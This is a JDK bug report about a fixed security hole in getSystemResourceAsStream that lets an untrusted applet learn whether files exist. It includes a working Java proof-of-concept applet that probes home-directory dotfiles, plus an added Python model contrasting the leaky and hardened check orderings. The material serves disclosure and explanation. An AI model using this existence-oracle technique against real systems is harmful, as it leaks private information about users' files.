Type: Bug
Resolution: Fixed
Priority: P1
Affected Version: 1.1.2
Fixed Version: 1.1.4
CPU: sparc
OS: solaris_2.5.1
Verification: Not verified
The getSystemResourceAsStream call has a security hole in it which
allows an applet to see whether files exist or not. If a user has "."
in their CLASSPATH (which is common for developers) and the current
directory is a user's home directory (common for web browsers launched
at startup), it is quite easy.

Here's a sample program. Put "." in your CLASSPATH and cd to your
home directory. Then call this applet. It will generate a bunch of
security exceptions, but will correctly report whether the listed
files exist or not.
import java.applet.*;
import java.io.*;

public class GetResource extends Applet {
    public void init() {
        // Probe a few dotfiles that commonly live in a home directory.
        report(".cshrc");
        report(".login");
        report(".profile");
        report(".exrc");
        report(".emacs");
    }

    void report(String name) {
        boolean e = exists(name);
        System.err.println(name + ": " + (e ? "yes" : "no"));
    }

    boolean exists(String name) {
        try {
            // With "." on the CLASSPATH the name resolves relative to the
            // current directory. A null result means the file was not found;
            // the SecurityException is only thrown after the file was found,
            // when the FileInputStream is constructed.
            InputStream i = ClassLoader.getSystemResourceAsStream(name);
            return (i != null);
        } catch (SecurityException ex) {
            return true;
        }
    }
}
The problem is that getSystemResourceAsStream in resource.c checks to
see if the file exists before trying to construct a FileInputStream
(where the security check is done). Therefore, returning null means
the file doesn't exist and throwing an exception means that the file
does exist.
Alan Bishop
WebTV Networks, Inc.
###@###.###
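The ordering problem described in the report, modelled in Python as an added example (not code from the report or from the JDK's resource.c): a leaky lookup that tests existence before the access check, beside a hardened lookup that performs the access check first. The `_check_read` function and the `allowed` flag are a constructed stand-in for the SecurityManager check; `demo()` compares the only outcomes an untrusted caller can observe.

```python
import tempfile
from pathlib import Path


class AccessDenied(Exception):
    """Raised when the caller is not allowed to read local files."""


def _check_read(allowed: bool) -> None:
    # Constructed stand-in for the JDK's SecurityManager.checkRead() call.
    if not allowed:
        raise AccessDenied("untrusted code may not read local files")


def leaky_lookup(base: Path, name: str, allowed: bool):
    """Ordering described in the report: existence is tested before the
    security check, so None versus AccessDenied reveals whether the file exists."""
    path = base / name
    if not path.exists():
        return None
    _check_read(allowed)
    return path.open("rb")


def safe_lookup(base: Path, name: str, allowed: bool):
    """Hardened ordering: the security check runs first, on the name alone,
    so an untrusted caller sees the same outcome whether or not the file exists."""
    _check_read(allowed)
    path = base / name
    if not path.exists():
        return None
    return path.open("rb")


def observe(lookup, base: Path, name: str, allowed: bool) -> str:
    """Reduce a lookup to the outcome label a caller can distinguish."""
    try:
        stream = lookup(base, name, allowed)
    except AccessDenied:
        return "denied"
    if stream is None:
        return "absent"
    stream.close()
    return "stream"


def demo() -> dict:
    """Run both orderings against a constructed home directory holding one dotfile."""
    with tempfile.TemporaryDirectory() as d:
        base = Path(d)
        (base / ".cshrc").write_text("# constructed sample dotfile\n")
        return {
            lookup.__name__: (
                observe(lookup, base, ".cshrc", allowed=False),      # exists, no permission
                observe(lookup, base, ".nosuchfile", allowed=False), # absent, no permission
                observe(lookup, base, ".cshrc", allowed=True),       # exists, permitted
            )
            for lookup in (leaky_lookup, safe_lookup)
        }
```

With the leaky ordering the two unprivileged probes return different labels, which is exactly the oracle the report describes; with the hardened ordering they are indistinguishable.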